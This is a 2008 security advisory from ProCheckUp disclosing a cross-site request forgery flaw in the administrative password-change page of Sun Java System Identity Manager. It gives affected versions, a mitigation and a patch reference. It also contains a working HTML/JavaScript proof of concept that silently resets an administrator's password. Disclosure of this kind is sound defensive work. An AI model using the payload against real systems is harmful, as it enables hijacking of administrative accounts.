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ProCheckUp Security Advisory 2007.11

🗓️ 19 Nov 2008 00:00:00Reported by Adrian PastorType 
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Sun Java System Identity Manager CSRF Vulnerability PR07-11 Advisor

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`PR07-11: Cross-site Request Forgery (CSRF) on Sun Java System Identity  
Manager  
  
Date Found: 11th June 2007  
  
Vendor Contacted: 18th June 2007  
  
Date Public: 10th November 2008  
  
Severity: Medium/High  
  
Credits: Adrian Pastor and Jan Fry of ProCheckUp Ltd (www.procheckup.com).  
  
ProCheckUp thanks Sun for working with us.  
  
  
Description:  
  
Sun Java System Identity Manager is vulnerable to CSRF within the  
administrative "update password" feature ("/idm/admin/changeself.jsp")  
  
The "update password" request is not tokenized using non-predictable  
values. Additionally, the administrative user is *not* asked to enter  
the previous password before updating it. Since the request is  
completely predictable it is vulnerable to CSRF.  
  
  
Consequences:  
  
Attackers can hijack administrative accounts by convincing an  
administrative user to visit a malicious HTML page while being  
authenticated to Sun Java System Identity Manager.  
  
  
Example of "update password" request:  
  
POST /idm/admin/changeself.jsp HTTP/1.1  
Host: target.tld  
Content-Length: 181  
Cookie: JSESSIONID=E291DB92432831FC109C4214D8C8C8D7  
  
id=&command=Save&activeControl=&resourceAccounts.password=Password1&resourceAccounts.confirmPassword=Password1&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true  
  
  
  
Although the original request is submitted as a 'POST', it can be also  
converted to a 'GET'. The following PoC forges the "update password"  
request as a 'GET'.  
  
  
Proof of concept (PoC):  
  
  
<html>  
<h1>CSRF attack demo - changes administrative password to 'Password19'</h1>  
<script>  
var img = new Image();  
img.src =  
'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Password19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true';  
  
</script>  
</html>  
  
  
  
Notes:  
  
1. the 'resourceAccounts.currentResourceAccounts%5BLighthouse%5D'  
parameter is a constant (never changes).  
  
2. There are also other requests that are vulnerable to CSRF, but this  
advisory only discusses the most interesting one (from a security point  
of view).  
  
3. This risk of this vulnerability can be mitigated by enabling  
passphrase authentication on System Identity Manager. This way, users  
would need to enter their username, password, and two random characters  
of their secret passphrase. This means that even if the "update  
password" request was successfully CSRFed, the attacker would still need  
to know the victim administrator's passphrase to login.  
  
  
Successfully tested on:  
  
Server environment:  
  
Sun Java System Identity Manager 6.0 (20061212 SP 2)  
Apache-Coyote/1.1  
Apache Tomcat/5.0.28  
  
Client environment:  
  
Microsoft Internet Explorer 7.0.5730.11  
  
Sun has confirmed the following products to be affected by this issue:  
  
Sun Java System Identity Manager 6.0, Sun Java System Identity Manager  
7.0, Sun Java System Identity Manager 7.1  
  
  
References:  
  
http://www.sun.com/software/products/identity_mgr/index.xml  
http://www.procheckup.com/Vulnerabilities  
  
  
Fix:  
  
Apply the patches released by Sun. This vulnerability has been filed as  
Sun Bugzilla bug 16703.  
  
For more information please see  
http://sunsolve.sun.com/search/document.do?assetkey=1-26-243386-1  
  
  
Legal:  
  
Copyright 2008 ProCheckUp Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if the Bulletin is not changed or edited in any way, is attributed  
to ProCheckUp indicating this web page URL, and provided such  
reproduction and/or distribution is performed for non-commercial purposes.  
  
Any other use of this information is prohibited. ProCheckUp is not  
liable for any misuse of this information by any third party.  
  
ProCheckUp is not responsible for the content of external Internet sites.  
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